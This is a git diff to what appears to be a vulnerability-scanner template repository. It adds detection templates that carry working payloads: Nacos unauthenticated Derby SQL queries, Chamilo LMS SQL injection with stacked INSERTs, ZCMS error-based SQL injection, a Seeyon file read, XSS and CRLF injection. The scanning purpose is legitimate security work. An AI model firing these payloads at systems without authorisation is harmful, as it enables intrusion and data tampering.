diff --git a/README.md b/README.md index f76869b040..b838ee2abc 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 297 | vulnerabilities | 139 | exposed-panels | 122 | -| takeovers | 67 | exposures | 88 | technologies | 64 | +| cves | 297 | vulnerabilities | 142 | exposed-panels | 122 | +| takeovers | 67 | exposures | 89 | technologies | 64 | | misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | | default-logins | 24 | exposed-tokens | 0 | dns | 8 | | fuzzing | 8 | helpers | 8 | iot | 11 | -**102 directories, 1021 files**. +**102 directories, 1031 files**. diff --git a/cves/2020/CVE-2020-36287.yaml b/cves/2020/CVE-2020-36287.yaml deleted file mode 100644 index 00c017c02a..0000000000 --- a/cves/2020/CVE-2020-36287.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-36287 - -info: - name: Jira Dashboard Gadgets / Information Disclosure - author: Jafar_Abo_Nada - severity: medium - description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. - tags: cve,cve2020,jira,atlassian,disclosure - reference: | - - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 - - # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs - -requests: - - raw: - - | - GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - - | - GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "contains(body_1, '')" - - "status_code_2 != 401" - condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml new file mode 100644 index 0000000000..81a6d3fc5d --- /dev/null +++ b/cves/2021/CVE-2021-29442.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + author: dwisiswant0 + severity: high + reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git a/exposures/backups/exposed-mysql-initial.yaml b/exposures/backups/exposed-mysql-initial.yaml new file mode 100644 index 0000000000..f644e79c49 --- /dev/null +++ b/exposures/backups/exposed-mysql-initial.yaml @@ -0,0 +1,24 @@ +id: exposed-mysql-initial + +info: + name: Exposed mysql.initial + author: ELSFA7110 + severity: info + reference: https://hackerone.com/reports/1081817 + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/mysql.initial.sql" + + matchers-condition: and + matchers: + - type: word + words: + - "Roundcube Webmail initial database structure" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/sonarqube-public-projects.yaml b/misconfiguration/sonarqube-public-projects.yaml index 92a5dc1060..8fbf957e16 100644 --- a/misconfiguration/sonarqube-public-projects.yaml +++ b/misconfiguration/sonarqube-public-projects.yaml @@ -21,8 +21,8 @@ requests: - type: word words: - - 'results' - - 'items' - - 'more' + - '"results":' + - '"items":' + - '"more":' part: body condition: and \ No newline at end of file diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index 232a7ddcd7..a10ce723fc 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml @@ -16,11 +16,9 @@ requests: - type: word part: body words: - - "JAVA_HOME" - - "sping.config.location" - - "spring.application.name" + - "applicationConfig" - "local.server.port" - condition: or + condition: and - type: status status: - 200 diff --git a/misconfiguration/springboot/springboot-httptrace.yaml b/misconfiguration/springboot/springboot-httptrace.yaml new file mode 100644 index 0000000000..bd6d211c5d --- /dev/null +++ b/misconfiguration/springboot/springboot-httptrace.yaml @@ -0,0 +1,34 @@ +id: springboot-httptrace + +info: + name: Detect Springboot httptrace + author: that_juan_ & dwisiswant0 & wdahlenb + severity: low + description: View recent HTTP requests and responses + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator/httptrace" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"traces"' + - '"timestamp"' + - '"principal"' + - '"session"' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/misconfiguration/springboot/springboot-loggers.yaml b/misconfiguration/springboot/springboot-loggers.yaml index 87d02229a9..d1e73b434f 100644 --- a/misconfiguration/springboot/springboot-loggers.yaml +++ b/misconfiguration/springboot/springboot-loggers.yaml @@ -17,8 +17,8 @@ requests: part: body words: - '"loggers"' - - '"profiles":' - condition: or + - '"levels"' + condition: and - type: status status: diff --git a/misconfiguration/springboot/springboot-trace.yaml b/misconfiguration/springboot/springboot-trace.yaml index 39905444e1..170360f235 100644 --- a/misconfiguration/springboot/springboot-trace.yaml +++ b/misconfiguration/springboot/springboot-trace.yaml @@ -10,22 +10,21 @@ requests: - method: GET path: - "{{BaseURL}}/trace" - - "{{BaseURL}}/actuator/trace" - - "{{BaseURL}}/httptrace" - - "{{BaseURL}}/actuator/httptrace" matchers-condition: and matchers: - type: word part: body words: - - "traces" - - "response" - - "request" - - "principal" - condition: or + - '"timestamp"' + - '"info"' + - '"method"' + - '"path"' + condition: and + - type: status status: - 200 + - type: word words: - "application/json" diff --git a/network/java-rmi-detect.yaml b/network/java-rmi-detect.yaml new file mode 100644 index 0000000000..07437783bb --- /dev/null +++ b/network/java-rmi-detect.yaml @@ -0,0 +1,21 @@ +id: java-rmi-detect + +info: + name: Detect Java RMI Protocol + author: F1tz + severity: info + tags: network,rmi + +network: + - inputs: + - data: "{{hex_decode('4a524d4900024b')}}" + + host: + - "{{Hostname}}" + read-size: 1024 + + matchers: + - type: regex + part: raw + regex: + - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" \ No newline at end of file diff --git a/network/weblogic-iiop-detect.yaml b/network/weblogic-iiop-detect.yaml new file mode 100644 index 0000000000..a451249992 --- /dev/null +++ b/network/weblogic-iiop-detect.yaml @@ -0,0 +1,24 @@ +id: weblogic-iiop-detect + +info: + name: Detect Weblogic IIOP Protocol + author: F1tz + severity: info + description: Check IIOP protocol status. + tags: network,weblogic + +network: + - inputs: + - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" + + host: + - "{{Hostname}}" + read-size: 1024 + + matchers-condition: and + matchers: + - type: word + words: + - "GIOP" + - "weblogic" + condition: and \ No newline at end of file diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml new file mode 100644 index 0000000000..3354242dac --- /dev/null +++ b/network/weblogic-t3-detect.yaml @@ -0,0 +1,20 @@ +id: weblogic-t3-detect + +info: + name: Detect Weblogic T3 Protocol + author: F1tz + severity: info + description: Check T3 protocol status. + tags: network,weblogic + +network: + - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + + host: + - "{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" \ No newline at end of file diff --git a/takeovers/fastly-takeover.yaml b/takeovers/fastly-takeover.yaml index 8f55b5a407..8c08c7ad6a 100644 --- a/takeovers/fastly-takeover.yaml +++ b/takeovers/fastly-takeover.yaml @@ -3,9 +3,9 @@ id: fastly-takeover info: name: fastly takeover detection author: pdcommunity - severity: high + severity: info tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22 requests: - method: GET diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index 57320bcf4d..4876a8a42c 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" matchers: - type: regex diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 74cb0945be..0565611a9c 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -45,5 +45,5 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/WooYun-2015-148227.yaml new file mode 100644 index 0000000000..f15f8d3432 --- /dev/null +++ b/vulnerabilities/other/WooYun-2015-148227.yaml @@ -0,0 +1,25 @@ +id: WooYun-2015-148227 +info: + name: Seeyon WooYun LFR + author: princechaddha + severity: high + reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + tags: seeyon,wooyun,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "NCInvokerServlet" + part: body + - type: word + part: header + words: + - "application/xml" diff --git a/vulnerabilities/other/chamilo-lms-sqli.yaml b/vulnerabilities/other/chamilo-lms-sqli.yaml new file mode 100644 index 0000000000..8a3b456b4d --- /dev/null +++ b/vulnerabilities/other/chamilo-lms-sqli.yaml @@ -0,0 +1,29 @@ +id: chamilo-lms-sqli +info: + author: undefl0w + name: Chamilo LMS SQL Injection + severity: high + description: Finds sql injection in Chamilo version 1.11.14 + tags: chamilo,sqli + +requests: + - raw: + - | + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "] + + - | + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=image&field_id=image&tag=image&from=image&search=image&options=["test') or 1=1 -- "] + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "{{randstr}}")' \ No newline at end of file diff --git a/vulnerabilities/other/chamilo-lms-xss.yaml b/vulnerabilities/other/chamilo-lms-xss.yaml index 97005117e1..3af835083c 100644 --- a/vulnerabilities/other/chamilo-lms-xss.yaml +++ b/vulnerabilities/other/chamilo-lms-xss.yaml @@ -10,15 +10,14 @@ info: requests: - method: GET path: - - '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' - - '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' + - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"' matchers-condition: and matchers: - type: word part: body words: - - "onmouseover%3dxss(0x01CE61)" + - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)' - type: status status: - 200 diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml new file mode 100644 index 0000000000..3936c83257 --- /dev/null +++ b/vulnerabilities/other/zcms-v3-sqli.yaml @@ -0,0 +1,21 @@ +id: zcms-v3-sqli +info: + name: ZCMS SQL Injection + author: princechaddha + severity: high + reference: https://www.anquanke.com/post/id/183241 + tags: zcms,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 9484adff46..5215139461 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -63,7 +63,10 @@ requests: - type: word words: - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)' + - "PHP Version" + - "Configuration Command" part: body + condition: and - type: word words: - 'text/html'